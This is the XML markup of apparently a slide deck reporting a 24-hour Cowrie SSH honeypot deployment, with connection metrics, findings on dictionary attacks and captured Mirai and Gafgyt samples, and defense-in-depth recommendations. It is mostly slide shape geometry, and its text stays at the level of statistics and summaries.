                  <a:pt x="73960" y="72353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81260" y="64673"/>
                  <a:pt x="85725" y="54293"/>
                  <a:pt x="85725" y="42863"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85725" y="19199"/>
                  <a:pt x="66526" y="0"/>
                  <a:pt x="42862" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19199" y="0"/>
                  <a:pt x="0" y="19199"/>
                  <a:pt x="0" y="42863"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="54293"/>
                  <a:pt x="4465" y="64673"/>
                  <a:pt x="11765" y="72353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15448" y="76237"/>
                  <a:pt x="18730" y="80747"/>
                  <a:pt x="20337" y="85725"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="65365" y="85725"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="64294" y="96441"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21431" y="96441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21431" y="100013"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21431" y="109880"/>
                  <a:pt x="29423" y="117872"/>
                  <a:pt x="39291" y="117872"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="46434" y="117872"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="56302" y="117872"/>
                  <a:pt x="64294" y="109880"/>
                  <a:pt x="64294" y="100013"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="64294" y="96441"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41077" y="25003"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="32192" y="25003"/>
                  <a:pt x="25003" y="32192"/>
                  <a:pt x="25003" y="41077"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25003" y="44046"/>
                  <a:pt x="22614" y="46434"/>
                  <a:pt x="19645" y="46434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16676" y="46434"/>
                  <a:pt x="14288" y="44046"/>
                  <a:pt x="14288" y="41077"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14288" y="26276"/>
                  <a:pt x="26276" y="14288"/>
                  <a:pt x="41077" y="14288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44046" y="14288"/>
                  <a:pt x="46434" y="16676"/>
                  <a:pt x="46434" y="19645"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46434" y="22614"/>
                  <a:pt x="44046" y="25003"/>
                  <a:pt x="41077" y="25003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70" name="Text 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8626376" y="5353050"/>
            <a:ext cx="2914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Proactive threat detection and containment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85763" y="5986463"/>
            <a:ext cx="11420475" cy="809625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11420475" h="809625">
                <a:moveTo>
                  <a:pt x="76202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11344273" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11386358" y="0"/>
                  <a:pt x="11420475" y="34117"/>
                  <a:pt x="11420475" y="76202"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11420475" y="733423"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11420475" y="775508"/>
                  <a:pt x="11386358" y="809625"/>
                  <a:pt x="113442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471488" y="6143625"/>
            <a:ext cx="10858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514350" y="6486525"/>
            <a:ext cx="1000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Recommendations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1641872" y="6200775"/>
            <a:ext cx="9525" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9525" h="381000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525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33333"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Text 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803797" y="6296025"/>
            <a:ext cx="681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Defense-in-Depth Strategy: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Implement multiple layers of security controls to protect against evolving botnet threats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10430024" y="6196013"/>
            <a:ext cx="1209675" cy="390525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1209675" h="390525">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1171575" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1192617" y="0"/>
                  <a:pt x="1209675" y="17058"/>
                  <a:pt x="1209675" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1209675" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1209675" y="373467"/>
                  <a:pt x="1192617" y="390525"/>
                  <a:pt x="11715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 w="12700">
            <a:solidFill>
              <a:srgbClr val="10B981">
                <a:alpha val="40000"/>
              </a:srgbClr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10587186" y="6305550"/>
            <a:ext cx="96663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Priority: Critical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allpapercave.com/587a593c3be369b85ece37a0bb4b2ff23eb45f29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91919">
                  <a:alpha val="95000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="191919">
                  <a:alpha val="90000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="6366F1">
                  <a:alpha val="2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573881"/>
            <a:ext cx="1238250" cy="390525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1238250" h="390525">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1200150" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1221192" y="0"/>
                  <a:pt x="1238250" y="17058"/>
                  <a:pt x="1238250" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1238250" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1238250" y="373467"/>
                  <a:pt x="1221192" y="390525"/>
                  <a:pt x="12001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683419"/>
            <a:ext cx="99268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197769"/>
            <a:ext cx="88201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Constant Automated Assault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140744"/>
            <a:ext cx="86296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deployment confirms that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FEFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="6366F1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exposed SSH services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are under constant, automated assault by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FEFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EF4444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sophisticated botnet infrastructure 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 The data provides actionable intelligence for strengthening defensive postures against evolving IoT botnet threats.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5763" y="3378994"/>
            <a:ext cx="2733675" cy="1038225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2733675" h="1038225">
                <a:moveTo>
                  <a:pt x="76195" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2657480" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2699561" y="0"/>
                  <a:pt x="2733675" y="34114"/>
                  <a:pt x="2733675" y="76195"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2733675" y="962030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2733675" y="1004111"/>
                  <a:pt x="2699561" y="1038225"/>
                  <a:pt x="2657480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81025" y="3574256"/>
            <a:ext cx="2514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5,842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81025" y="4031456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Connection attempts in 24 hours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281363" y="3378994"/>
            <a:ext cx="2733675" cy="1038225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2733675" h="1038225">
                <a:moveTo>
                  <a:pt x="76195" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2657480" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2699561" y="0"/>
                  <a:pt x="2733675" y="34114"/>
                  <a:pt x="2733675" y="76195"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2733675" y="962030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2733675" y="1004111"/>
                  <a:pt x="2699561" y="1038225"/>
                  <a:pt x="2657480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3476625" y="3574256"/>
            <a:ext cx="2514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 min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476625" y="4031456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Average time to first attack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76963" y="3378994"/>
            <a:ext cx="2733675" cy="1038225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2733675" h="1038225">
                <a:moveTo>
                  <a:pt x="76195" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2657480" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2699561" y="0"/>
                  <a:pt x="2733675" y="34114"/>
                  <a:pt x="2733675" y="76195"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2733675" y="962030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2733675" y="1004111"/>
                  <a:pt x="2699561" y="1038225"/>
                  <a:pt x="2657480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72225" y="3574256"/>
            <a:ext cx="2514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72225" y="4031456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Malware samples captured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85763" y="4731544"/>
            <a:ext cx="8524875" cy="1552575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8524875" h="1552575">
                <a:moveTo>
                  <a:pt x="76200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8448675" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8490759" y="0"/>
                  <a:pt x="8524875" y="34116"/>
                  <a:pt x="8524875" y="76200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8524875" y="1476375"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8524875" y="1518459"/>
                  <a:pt x="8490759" y="1552575"/>
                  <a:pt x="8448675" y="1552575"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76200" y="1552575"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34116" y="1552575"/>
                  <a:pt x="0" y="1518459"/>
                  <a:pt x="0" y="14763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62626">
              <a:alpha val="8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585788" y="5003006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9" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993874" y="4964906"/>
            <a:ext cx="7781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Takeaway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93874" y="5307806"/>
            <a:ext cx="77628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Honeypots serve as critical early warning systems, providing real-world threat intelligence while isolating attacks from production systems. The findings underscore the urgent need for robust SSH security practices in an era of pervasive IoT botnet activity.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953923" y="5181600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Report by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9925348" y="5410200"/>
            <a:ext cx="1504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Maxwell Mwangi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9953923" y="5676900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Security Researcher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963448" y="5943600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2026-02-06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866775" cy="314325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="866775" h="314325">
                <a:moveTo>
                  <a:pt x="38099" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="828676" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="849717" y="0"/>
                  <a:pt x="866775" y="17058"/>
                  <a:pt x="866775" y="38099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="866775" y="276226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="866775" y="297267"/>
                  <a:pt x="849717" y="314325"/>
                  <a:pt x="828676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4825" y="476250"/>
            <a:ext cx="687288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191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09713"/>
            <a:ext cx="5591175" cy="2400300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5591175" h="2400300">
                <a:moveTo>
                  <a:pt x="76210" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5514965" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5557055" y="0"/>
                  <a:pt x="5591175" y="34120"/>
                  <a:pt x="5591175" y="76210"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5591175" y="2324090"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5591175" y="2366180"/>
                  <a:pt x="5557055" y="2400300"/>
                  <a:pt x="5514965" y="2400300"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76210" y="2400300"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34120" y="2400300"/>
                  <a:pt x="0" y="2366180"/>
                  <a:pt x="0" y="23240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81025" y="1704975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81025" y="2085975"/>
            <a:ext cx="527685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of a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highlight>
                  <a:srgbClr val="6366F1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medium-interaction SSH honeypot (Cowrie)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designed to mimic a vulnerable Linux server. By tunneling the local service through a global Ngrok endpoint, the honeypot was exposed to international botnet clusters for comprehensive threat analysis.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5763" y="4071938"/>
            <a:ext cx="5591175" cy="2400300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5591175" h="2400300">
                <a:moveTo>
                  <a:pt x="76210" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5514965" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5557055" y="0"/>
                  <a:pt x="5591175" y="34120"/>
                  <a:pt x="5591175" y="76210"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5591175" y="2324090"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5591175" y="2366180"/>
                  <a:pt x="5557055" y="2400300"/>
                  <a:pt x="5514965" y="2400300"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76210" y="2400300"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34120" y="2400300"/>
                  <a:pt x="0" y="2366180"/>
                  <a:pt x="0" y="23240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1025" y="4267200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Findings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0075" y="4686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1" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="847725" y="4648200"/>
            <a:ext cx="486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Immediate influx of automated scanning traffic upon EU-West exposure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0075" y="4991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3" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="847725" y="4953000"/>
            <a:ext cx="3905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Dominance of dictionary attacks using default credentials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0075" y="5295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5" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="847725" y="5257800"/>
            <a:ext cx="4514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Post-exploitation behavior follows predictable three-phase pattern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0075" y="56007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7" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="847725" y="5562600"/>
            <a:ext cx="3609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Malware payloads primarily Mirai and Gafgyt variants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15063" y="1509713"/>
            <a:ext cx="5591175" cy="2828925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5591175" h="2828925">
                <a:moveTo>
                  <a:pt x="76211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5514964" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5557054" y="0"/>
                  <a:pt x="5591175" y="34121"/>
                  <a:pt x="5591175" y="76211"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5591175" y="2752714"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5591175" y="2794804"/>
                  <a:pt x="5557054" y="2828925"/>
                  <a:pt x="5514964" y="2828925"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76211" y="2828925"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34121" y="2828925"/>
                  <a:pt x="0" y="2794804"/>
                  <a:pt x="0" y="2752714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410325" y="1704975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24-Hour Metrics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15088" y="2128838"/>
            <a:ext cx="2514600" cy="923925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2514600" h="923925">
                <a:moveTo>
                  <a:pt x="38103" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2476497" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2497541" y="0"/>
                  <a:pt x="2514600" y="17059"/>
                  <a:pt x="2514600" y="38103"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2514600" y="885822"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2514600" y="906866"/>
                  <a:pt x="2497541" y="923925"/>
                  <a:pt x="2476497" y="923925"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38103" y="923925"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17059" y="923925"/>
                  <a:pt x="0" y="906866"/>
                  <a:pt x="0" y="885822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86525" y="2286000"/>
            <a:ext cx="2371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5,842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538913" y="2705100"/>
            <a:ext cx="2266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Total Connections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091613" y="2128838"/>
            <a:ext cx="2514600" cy="923925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2514600" h="923925">
                <a:moveTo>
                  <a:pt x="38103" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2476497" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2497541" y="0"/>
                  <a:pt x="2514600" y="17059"/>
                  <a:pt x="2514600" y="38103"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2514600" y="885822"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2514600" y="906866"/>
                  <a:pt x="2497541" y="923925"/>
                  <a:pt x="2476497" y="923925"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38103" y="923925"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17059" y="923925"/>
                  <a:pt x="0" y="906866"/>
                  <a:pt x="0" y="885822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9163050" y="2286000"/>
            <a:ext cx="2371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812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215438" y="2705100"/>
            <a:ext cx="2266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Unique Source IPs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15088" y="3214688"/>
            <a:ext cx="2514600" cy="923925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2514600" h="923925">
                <a:moveTo>
                  <a:pt x="38103" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2476497" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2497541" y="0"/>
                  <a:pt x="2514600" y="17059"/>
                  <a:pt x="2514600" y="38103"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2514600" y="885822"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2514600" y="906866"/>
                  <a:pt x="2497541" y="923925"/>
                  <a:pt x="2476497" y="923925"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38103" y="923925"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17059" y="923925"/>
                  <a:pt x="0" y="906866"/>
                  <a:pt x="0" y="885822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486525" y="3371850"/>
            <a:ext cx="2371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247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538913" y="3790950"/>
            <a:ext cx="2266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Successful Logins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091613" y="3214688"/>
            <a:ext cx="2514600" cy="923925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2514600" h="923925">
                <a:moveTo>
                  <a:pt x="38103" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2476497" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2497541" y="0"/>
                  <a:pt x="2514600" y="17059"/>
                  <a:pt x="2514600" y="38103"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2514600" y="885822"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2514600" y="906866"/>
                  <a:pt x="2497541" y="923925"/>
                  <a:pt x="2476497" y="923925"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38103" y="923925"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17059" y="923925"/>
                  <a:pt x="0" y="906866"/>
                  <a:pt x="0" y="885822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9163050" y="3371850"/>
            <a:ext cx="2371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 min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215438" y="3790950"/>
            <a:ext cx="2266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 to First Hit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15063" y="4500563"/>
            <a:ext cx="5591175" cy="1971675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5591175" h="1971675">
                <a:moveTo>
                  <a:pt x="76205" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5514970" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5557057" y="0"/>
                  <a:pt x="5591175" y="34118"/>
                  <a:pt x="5591175" y="76205"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5591175" y="1895470"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5591175" y="1937557"/>
                  <a:pt x="5557057" y="1971675"/>
                  <a:pt x="5514970" y="1971675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76205" y="1971675"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34118" y="1971675"/>
                  <a:pt x="0" y="1937557"/>
                  <a:pt x="0" y="18954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410325" y="4695825"/>
            <a:ext cx="529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Malware Capture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10325" y="5076825"/>
            <a:ext cx="76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094041" y="5191125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Unique binary samples intercepted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15088" y="5653088"/>
            <a:ext cx="1028700" cy="276225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1028700" h="276225">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="990600" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1011642" y="0"/>
                  <a:pt x="1028700" y="17058"/>
                  <a:pt x="1028700" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1028700" y="238125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1028700" y="259167"/>
                  <a:pt x="1011642" y="276225"/>
                  <a:pt x="990600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410325" y="5648325"/>
            <a:ext cx="10858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Mirai variants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527429" y="5653088"/>
            <a:ext cx="1133475" cy="276225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1133475" h="276225">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1095375" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1116417" y="0"/>
                  <a:pt x="1133475" y="17058"/>
                  <a:pt x="1133475" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1133475" y="238125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1133475" y="259167"/>
                  <a:pt x="1116417" y="276225"/>
                  <a:pt x="1095375" y="276225"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38100" y="276225"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="276225"/>
                  <a:pt x="0" y="259167"/>
                  <a:pt x="0" y="23812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7522666" y="5648325"/>
            <a:ext cx="11906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Gafgyt variants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1333500" cy="314325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1333500" h="314325">
                <a:moveTo>
                  <a:pt x="38099" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1295401" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1316442" y="0"/>
                  <a:pt x="1333500" y="17058"/>
                  <a:pt x="1333500" y="38099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1333500" y="276226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1333500" y="297267"/>
                  <a:pt x="1316442" y="314325"/>
                  <a:pt x="129540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4825" y="476250"/>
            <a:ext cx="1154609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Setup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191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09713"/>
            <a:ext cx="4429125" cy="2828925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4429125" h="2828925">
                <a:moveTo>
                  <a:pt x="76211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4352914" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4395004" y="0"/>
                  <a:pt x="4429125" y="34121"/>
                  <a:pt x="4429125" y="76211"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4429125" y="2752714"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4429125" y="2794804"/>
                  <a:pt x="4395004" y="2828925"/>
                  <a:pt x="4352914" y="2828925"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76211" y="2828925"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34121" y="2828925"/>
                  <a:pt x="0" y="2794804"/>
                  <a:pt x="0" y="2752714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81025" y="1704975"/>
            <a:ext cx="412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Infrastructure Details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81025" y="21431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04850" y="22574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9" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076325" y="2124075"/>
            <a:ext cx="101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 Host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76325" y="2314575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jinguban (VM)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1025" y="26765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685800" y="27908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3819" y="26194"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="97631" y="26194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97631" y="40481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73819" y="40481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73819" y="26194"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="71438" y="9525"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="63550" y="9525"/>
                  <a:pt x="57150" y="15925"/>
                  <a:pt x="57150" y="23813"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="57150" y="42863"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="57150" y="50750"/>
                  <a:pt x="63550" y="57150"/>
                  <a:pt x="71438" y="57150"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76200" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76200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38100" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="95250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33338" y="95250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="25450" y="95250"/>
                  <a:pt x="19050" y="101650"/>
                  <a:pt x="19050" y="109537"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19050" y="128588"/>
                </a:lnTo>
                <a:cubicBezTo>
